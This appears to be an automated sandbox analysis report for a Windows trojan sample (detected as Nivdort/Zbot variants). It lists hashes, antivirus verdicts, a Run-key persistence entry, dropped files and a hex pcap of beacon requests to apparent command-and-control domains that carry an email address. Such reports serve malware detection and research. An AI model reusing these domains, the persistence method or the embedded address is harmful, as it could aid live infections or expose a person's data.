Analysis Date | 2015-08-12 20:56:09 |
---|---|
MD5 | d6cd64a185269790c5ac60ace1446c01 |
SHA1 | 90b3e7ca32ca69e1b2c635fc3222d55bf051664b |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 65ab58ed39d82ca9febff77086099cff sha1: d4d7096e16368f358a92cad05399e46ac14478de size: 301568 | |
Section | .rdata md5: 27cd77fa390a50c6da8c2f031c9d5dac sha1: cbc641a1ffce01666e7fd44cc026e0b52e3afe01 size: 34304 | |
Section | .data md5: bccac870f185d3a2f1e2a81022c9afbf sha1: 6fc2a9a6e2e3bd2c095f3fe8231fdf1a3065fc2b size: 99328 | |
Timestamp | 2014-10-30 09:50:11 | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | 8a061ab750afc6ee824aa218cf6c7c0316dfcef0 | |
IMPhash | 6b17176fedd76d9ad4b16a4331c6ef8b | |
AV | CA (E-Trust Ino) | no_virus |
AV | F-Secure | Gen:Variant.Symmi.22722 |
AV | Dr. Web | Trojan.DownLoader11.44050 |
AV | ClamAV | Win.Trojan.Agent-810200 |
AV | Arcabit (arcavir) | Gen:Variant.Symmi.22722 |
AV | BullGuard | Gen:Variant.Symmi.22722 |
AV | Padvish | no_virus |
AV | VirusBlokAda (vba32) | no_virus |
AV | CAT (quickheal) | Trojan.Dynamer.AC3 |
AV | Trend Micro | TSPY_NIVDORT.SMB |
AV | Kaspersky | Trojan.Win32.Generic |
AV | Zillya! | no_virus |
AV | Emsisoft | Gen:Variant.Symmi.22722 |
AV | Ikarus | Trojan.FBAccountLock |
AV | Frisk (f-prot) | no_virus |
AV | Authentium | W32/Wonton.B.gen!Eldorado |
AV | MalwareBytes | Trojan.Zbot.WHE |
AV | MicroWorld (escan) | Gen:Variant.Symmi.22722 |
AV | Microsoft Security Essentials | TrojanSpy:Win32/Nivdort.BD |
AV | K7 | Trojan ( 004cb2771 ) |
AV | BitDefender | Gen:Variant.Symmi.22722 |
AV | Fortinet | W32/Agent.VNC!tr |
AV | Symantec | Downloader.Upatre!g15 |
AV | Grisoft (avg) | Win32/Cryptor |
AV | Eset (nod32) | Win32/Agent.VNC |
AV | Alwil (avast) | Downloader-TLD [Trj] |
AV | Ad-Aware | Gen:Variant.Symmi.22722 |
AV | Twister | Trojan.Generic.zndj |
AV | Avira (antivir) | TR/ATRAPS.Gen2 |
AV | Mcafee | Trojan-FEMT!D6CD64A18526 |
AV | Rising | no_virus |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PC Credential Authentication ➝ C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe |
---|---|
Creates File | C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe |
Creates Process | C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe |
Process
↳ C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe
Creates File | C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\ylnilnkqahj.exe |
---|---|
Creates File | C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.zvstn |
Creates File | \Device\Afd\Endpoint |
Creates Process | WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe" |
Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe"
Network Details:
Raw Pcap
0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d6c6961 6e61315f 706f7065 mail=liana1_pope 0x00000020 (00032) 73637540 7961686f 6f2e636f 6d266d65 scu@yahoo.com&me 0x00000030 (00048) 74686f64 3d706f73 74266c65 6e204854 thod=post&len HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a206d61 close..Host: ma 0x00000070 (00112) 6368696e 65636f6e 74726f6c 2e6e6574 chinecontrol.net 0x00000080 (00128) 0d0a0d0a .... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d6c6961 6e61315f 706f7065 mail=liana1_pope 0x00000020 (00032) 73637540 7961686f 6f2e636f 6d266d65 scu@yahoo.com&me 0x00000030 (00048) 74686f64 3d706f73 74266c65 6e204854 thod=post&len HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a20666f close..Host: fo 0x00000070 (00112) 72656967 6e636f6e 74726f6c 2e6e6574 reigncontrol.net 0x00000080 (00128) 0d0a0d0a .... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d6c6961 6e61315f 706f7065 mail=liana1_pope 0x00000020 (00032) 73637540 7961686f 6f2e636f 6d266d65 scu@yahoo.com&me 0x00000030 (00048) 74686f64 3d706f73 74266c65 6e204854 thod=post&len HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a206368 close..Host: ch 0x00000070 (00112) 696c6472 656e6d61 74746572 2e6e6574 ildrenmatter.net 0x00000080 (00128) 0d0a0d0a .... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d6c6961 6e61315f 706f7065 mail=liana1_pope 0x00000020 (00032) 73637540 7961686f 6f2e636f 6d266d65 scu@yahoo.com&me 0x00000030 (00048) 74686f64 3d706f73 74266c65 6e204854 thod=post&len HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a206661 close..Host: fa 0x00000070 (00112) 6d696c79 746f6765 74686572 2e6e6574 milytogether.net 0x00000080 (00128) 0d0a0d0a .... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e 0x00000010 (00016) 6d61696c 3d6c6961 6e61315f 706f7065 mail=liana1_pope 0x00000020 (00032) 73637540 7961686f 6f2e636f 6d266d65 scu@yahoo.com&me 0x00000030 (00048) 74686f64 3d706f73 74266c65 6e204854 thod=post&len HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a206368 close..Host: ch 0x00000070 (00112) 696c6472 656e636f 6e74726f 6c2e6e65 ildrencontrol.ne 0x00000080 (00128) 740d0a0d 0a t....
Strings